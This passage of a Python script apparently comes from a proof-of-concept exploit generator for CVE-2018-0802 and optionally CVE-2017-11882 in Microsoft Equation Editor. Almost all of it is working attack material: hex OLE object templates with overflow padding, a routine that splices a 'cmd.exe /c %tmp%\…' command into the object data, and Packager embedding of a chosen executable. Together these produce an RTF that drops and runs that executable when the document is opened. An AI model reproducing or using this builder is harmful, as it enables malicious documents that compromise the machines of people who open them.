193 | 000000000000000000000000000000000000001C00000002009EC4A900000000000000C8A75C00C4
194 | EE5B0000000000030100030A0A08000133C0508D44245250EB7F2020202020202020202020202020
195 | 20202020202020202020202020202020202020202020202020202020202020202020202020202020
196 | 20202020202020202020202020202020202020202020202020202020202020202020202020202020
197 | 202020202020202020202020202020202020202020202020202020202020202026908B44242C662D
198 | 51A8FFE0250000000000000000000000000000000000000000000000000000000000000000000000
199 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
200 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
201 | 0000000000000000000000000000000000000001050000050000000D0000004D45544146494C4550
202 | 494354007C010000FCFEFFFF4401000008007C01040100000100090000039E00000002001C000000
203 | 00000500000009020000000005000000020101000000050000000102FFFFFF00050000002E011800
204 | 0000050000000B0200000000050000000C02A00160021200000026060F001A00FFFFFFFF00001000
205 | 0000C0FFFFFFC6FFFFFF20020000660100000B00000026060F000C004D6174685479706500002000
206 | 1C000000FB0280FE0000000000009001000000000402001054696D6573204E657720526F6D616E00
207 | FEFFFFFF5F2D0A6500000A0000000000040000002D01000009000000320A60011000030000002020
208 | 20000A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC020000
209 | 00000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF6CE218000400
210 | 00002D01010004000000F0010000030000000000
211 | """
212 | 
213 | 
214 | OBJDATA_TEMPLATE_11882 = R"""
215 | 01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
216 | b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
217 | 0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
218 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
219 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
220 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
221 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
222 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
223 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
224 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
225 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
226 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
227 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
228 | fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffe
229 | fffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
230 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
231 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
232 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
233 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
234 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
235 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
236 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
237 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
238 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
239 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
240 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
241 | ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0074007200790000
242 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
243 | 00000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000
244 | 000000000000008020cea5613cd30103000000000200000000000001004f006c0065000000000000
245 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
246 | 00000000000000000000000a000201ffffffffffffffffffffffff00000000000000000000000000
247 | 0000000000000000000000000000000000000000000000000000001400000000000000010043006f
248 | 006d0070004f0062006a000000000000000000000000000000000000000000000000000000000000
249 | 00000000000000000000000000000000000000120002010100000003000000ffffffff0000000000
250 | 00000000000000000000000000000000000000000000000000000000000000010000006600000000
251 | 00000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000
252 | 00000000000000000000000000000000000000000000000000000012000201ffffffff04000000ff
253 | ffffff00000000000000000000000000000000000000000000000000000000000000000000000003
254 | 0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000fe
255 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
256 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
257 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
258 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
259 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
260 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
261 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
262 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
263 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
264 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
265 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
266 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
267 | ffffff01000002080000000000000000000000000000000000000000000000000000000000000000
268 | 0000000000000000000000000000000000000000000000000000000100feff030a0000ffffffff02
269 | ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e
270 | 30000c0000004453204571756174696f6e000b0000004571756174696f6e2e3300f439b271000000
271 | 00000000000000000000000000000000000000000000000000000000000000000000000000030004
272 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
273 | 000000000000000000000000000000000000001c00000002009ec4a900000000000000c8a75c00c4
274 | ee5b0000000000030101030a0a01085a5a4141414141414141414141414141414141414141414141
275 | 414141414141414141414141414141414141414141120c4300000000000000000000000000000000
276 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
277 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
278 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
279 | 00000000000000000000000000000000000000000000000000000000000000000000004500710075
280 | 006100740069006f006e0020004e0061007400690076006500000000000000000000000000000000
281 | 0000000000000000000000000000000000000020000200ffffffffffffffffffffffff0000000000
282 | 0000000000000000000000000000000000000000000000000000000000000004000000c500000000
283 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
284 | 00000000000000000000000000000000000000000000000000000000000000ffffffffffffffffff
285 | ffffff00000000000000000000000000000000000000000000000000000000000000000000000000
286 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
287 | 000000000000000000000000000000000000000000000000000000000000000000000000000000ff
288 | ffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000
289 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
290 | 00000000000000000000000000000000000000000000000000000000000000000000000000000000
291 | 00000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000000
292 | 00000000000000000000000000000000000000000000000000000001050000050000000d0000004d
293 | 45544146494c4550494354003421000035feffff9201000008003421cb010000010009000003c500
294 | 000002001c00000000000500000009020000000005000000020101000000050000000102ffffff00
295 | 050000002e0118000000050000000b0200000000050000000c02a001201e1200000026060f001a00
296 | ffffffff000010000000c0ffffffc6ffffffe01d0000660100000b00000026060f000c004d617468
297 | 54797065000020001c000000fb0280fe0000000000009001000000000402001054696d6573204e65
298 | 7720526f6d616e00feffffff6b2c0a0700000a0000000000040000002d0100000c000000320a6001
299 | 90160a000000313131313131313131310c000000320a6001100f0a00000031313131313131313131
300 | 0c000000320a600190070a000000313131313131313131310c000000320a600110000a0000003131
301 | 31313131313131310a00000026060f000a00ffffffff0100000000001c000000fb02100007000000
302 | 0000bc02000000000102022253797374656d000048008a0100000a000600000048008a01ffffffff
303 | 7cef1800040000002d01010004000000f0010000030000000000
304 | """
305 | 
306 | 
307 | def create_ole_exec_primitive(command, objdata_template, command_offset, max_len):
308 |     if len(command) > max_len:
309 |         raise ValueError("primitive command must be shorter than %d bytes" % max_len)
310 |     hex_command = command.ljust(max_len).encode("hex")
311 |     objdata_hex_stream = objdata_template.translate(None, "\r\n")
312 |     ole_data = objdata_hex_stream[:command_offset] + hex_command + objdata_hex_stream[command_offset + len(hex_command):]
313 |     return OBJECT_HEADER + ole_data + OBJECT_TRAILER
314 | 
315 | 
316 | def create_rtf(header, trailer, executable, double):
317 |     # CVE-2018-0802 exploit
318 |     ole1 = create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)), OBJDATA_TEMPLATE_0802, (0xd12*2), 126)
319 |     p = Package(executable)
320 |     package = p.build_package()
321 |     outbuf = header + package + ole1
322 |     if double:
323 |         # CVE-2017-11882 exploit
324 |         outbuf += create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)), OBJDATA_TEMPLATE_11882, (0x949*2), 43)
325 |     return outbuf + trailer
326 | 
327 | 
328 | if __name__ == '__main__':
329 |     parser = argparse.ArgumentParser(description="PoC for CVE-2018-0802 using Packager.dll file drop method")
330 |     parser.add_argument("-e", "--executable", help="File to ebmed and exec", required=True)
331 |     parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
332 |     parser.add_argument('-d', "--double", help="Double-whammy! Exploits both CVE-2018-0802 and CVE-2017-11882 in the same document.", action="store_true")
333 | 
334 |     args = parser.parse_args()
335 | 
336 |     with open(args.output, 'w') as f:
337 |         f.write(create_rtf(RTF_HEADER, RTF_TRAILER, args.executable, args.double))
338 |     print "[+] Completed!"


--------------------------------------------------------------------------------